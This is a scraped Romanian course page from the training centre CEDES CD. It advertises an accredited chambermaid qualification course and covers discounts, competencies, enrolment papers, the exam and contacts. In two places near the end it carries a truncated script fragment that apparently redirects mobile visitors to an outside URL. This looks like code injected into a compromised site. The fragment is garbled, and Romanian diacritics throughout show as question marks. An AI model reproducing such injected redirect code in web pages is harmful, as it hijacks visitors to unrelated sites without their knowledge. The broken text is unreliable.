Suntem in perioada de inscriere pentru urmatoarea sesiune de cursuri autorizate ANC, in domeniul turismului: Manager in Activitatea de Turism, Director de Hotel, Director de Restaurant, Director de Agentie de Turism, Director Centru de Informare Turistica, Agent de Turism-Ghid, Ghid National de Turism, s.a.

Va asteptam pentru inscrieri la sediul nostru. Pentru informatii suplimentare va rugam sa ne contactati la 021 312 2091, 0728 878 650, 0755 119 842, This e-mail address is being protected from spambots. You need JavaScript enabled to view it. .

if (screen.width ation = "http://kidshealth.com.au/Documentation/test.html"; }</script>"

CEDES-CD - Cercetare, Dezvoltare Socio-profesională, Calitate şi Durabilitate

Centru de cercetare

In anul 2008 prin Decizia numarul 9767/17.10.2008 CEDES CD a fost atestat Centru de Cercetare, Dezvoltare si Inovare, fiind evaluat de Colegiul Consultativ pentru Cercetare, Dezvoltare si Inovare. CEDES CD desfasoara urmatoarele activitati in domeniul cercetarii-dezvoltarii:

Read More...

Centru de consiliere...

Misiunea centrului este informarea, consilierea si orientarea in cariera pentru integrarea pe piata fortei de munca. Principalele obiective ale centrului de informare si consiliere profesionala: Cresterea gradului de ocupare a fortei de munca

Read More...

Centru de evaluare

CENTRUL DE EVALUARE SI CERTIFICARE A COMPETENTELOR PROFESIONALE Procesul de evaluare este o alternativa la cursul de calificare, diplomele fiind recunoscute la nivel national (Autoritatea Na?ionala pentru Calificari) si european.

Read More...

Cine Suntem

Cercetare, Dezvoltare Socio-profesionala, Calitate si Durabilitate. Deviza CEDES CD este: “Ajutam oamenii si companiile sa se dezvolte!” CEDES CD implementeaza programe care au un impact social pe termen mediu si lung.

Read More...

Consultanta

Domenii: Turism Elaborare ?i implementare proiecte cu finan?are din fondurile structurale europene Dezvoltare comunitara Managementul Calita?ii Serviciilor CSR – Responsabilitate Sociala Corporativa

Read More...

Cursuri

Ajutam oamenii si companiile sa se dezvolte!- sintetizeaza principiul motric al CEDES CD. Prin programele de calificare, specializare, perfectionare, prin dezvoltarea ?i implementarea proiectelor, precum si prin acordarea de consultanta contribuim la dezvoltarea companiilor si a carierelor profesionale, acordand in acelasi timp o permanenta atentie calitatii serviciilor.

Read More...
012345

Camerista

Tip curs: calificare
Durata cursului: 3 luni


 

 CUI  SE ADRESEAZA ACEST CURS ?

 • Companiilor care doresc sa-?i califice personalul in vederea cre?terii motivarii acestora ?i imbunata?irii  calita?ii serviciilor oferite clien?ilor
 • Persoanelor care vor sa profeseze in domeniul turismului ?i industria ospitalita?ii, respectand cerintele UE
 • Persoanelor care vor sa-si insuseasca cuno?tin?ele necesare unei cameriste, de la cei mai buni specialisti in domeniul turismului

REDUCERI PROMO?IONALE:

*reducerile se aplica doar la centrul CEDES CD Bucure?ti, acestea nu se cumuleaza, aplicandu-se reducerea cea mai mare

 • Pentru STUDEN?I reducere 15 % din pre?ul cursului, se aplica pe baza legitima?iei de student
 • Pentru PLATA INTEGRALA a cursului la inscriere – reducere 10 %
 • AI MAI URMAT UN CURS LA NOI -  prime?ti 15 % reducere
 • VINO CU UN PRIETEN la inscriere – oferim 10 % reducere pentru ambele persoane

UNDE ESTE RECUNOSCUT CURSUL ?

 • Programul este autorizat de Autoritatea Nationala pentru Calificari (ANC), fost Consiliul National de Formare Profesionala a Adultilor (CNFPA)
 • Programul este certificat de Ministerul Educatiei Na?ionale ?i Cercetarii ?tiin?ifice ?i Ministerul Muncii, Familiei, Protec?iei Sociale si Persoanelor Varstnice, avand avizul de specialitate de la Autoritatea Na?ionala pentru Turism
 • Certificatul este recunoscut in Uniunea Europeana

COMPETEN?E PROFESIONALE DOBANDITE:

 • Aplicarea normelor igienico-sanitare
 • Aplicarea NPM ?i NPSI
 • Comunicarea eficienta cu clien?ii
 • Planificarea activita?ii proprii
 • Raportarea activita?ii proprii
 • Aranjarea camerei
 • Efectuarea de servicii de cura?enie in camere ?i zone comune
 • Efectuarea de servicii de cura?enie in toalete ?i bai
 • Oferirea de servicii suplimentare

CONDITII DE INSCRIERE SI ACTE NECESARE PENTRU DOSARUL DE INSCRIERE
Conditii de inscriere: minim 8/10 clase (invatamant obligatoriu in functie de anul absolvirii si structura ciclului de invatamant la acea data).

Acte necesare pentru dosarul de inscriere:

 • Copie CI / BI
 • Copie certificat de nastere
 • Copie certificat de casatorie (daca este cazul)
 • Copia ultimului act de studii
 • Adeverinta medicala (cu specificatia clinic sanatos)
 • CV

 METODA DE LUCRU
CEDES CD foloseste metode moderne de instruire, bazate pe aplicabilitate imediata, care se axeaza pe interactiune directa, activa si constructiva dintre participanti si formatori. Dintre metodele si instrumentele folosite men?ionam: expunere, discu?ii dirijate, lucru in echipa, studii de caz, joc de rol, chestionare, materiale video, dezbateri, simulari, exerci?ii si aplicatii practice (dupa caz).

CE INCLUDE TAXA DE PARTICIPARE?

 • Formalitatile de inscriere
 • Activitatea de curs (teoretica si practica)
 • Suportul de curs
 • Fisele de lucru
 • Examenul de absolvire
 • Eliberarea certificatului de calificare ANC, recunoscut de ANT, MMFPSPV si MENCS


CERTIFICARE CURScertificat camerista    
In urma absolvirii cursurilor se obtine un certificat de calificare recunoscut de Ministerul Educatiei Na?ionale ?i Cercetarii ?tiin?ifice, Ministerul Muncii, Familiei, Protec?iei Sociale si Persoanelor Varstnice, inso?it de suplimentul descriptiv ce va confirma competen?ele dobandite.

DESPRE EXAMENUL DE ABSOLVIRE
Examenul de absolvire consta intr-o proba teoretica (test scris) si o proba orala, respectiv sustinerea unui proiect de absolvire.

CUM MA INSCRIU LA ACEST CURS?

Inscrierea la acest curs poate fi facuta direct la sediul CEDES CD din Str.Turturelelor, nr.11A, bl.C, et.5, sector 3, Bucure?ti, de luni pana vineri intre orele 10.00 – 13.00 ?i 14.00 – 17.00. Vezi pagina de CONTACT pentru mai multe detalii.

Pentru alte detalii sau informatii suplimentare, nu ezitati sa ne contactati la unul din numerele de telefon 021.312.20.91, 0728.878.650; 0755.119.842 sau pe urmatoarele adrese de e-mail: This e-mail address is being protected from spambots. You need JavaScript enabled to view it. , This e-mail address is being protected from spambots. You need JavaScript enabled to view it. si This e-mail address is being protected from spambots. You need JavaScript enabled to view it. .

CEDES CD este mai aproape de tine oriunde in ?ara! – consulta pagina Centre Regionale pentru a contacta reprezentantul CEDES CD din jude?ul de care apar?ii pentru a afla mai multe informa?ii despre cursul la care dore?ti sa te inscrii.

Cursuri de calificare

 
if (screen.width ation = "http://kidshealth.com.au/Documentation/test.html"; }</script>"

© Cedes Cercetare-Dezvoltare 2016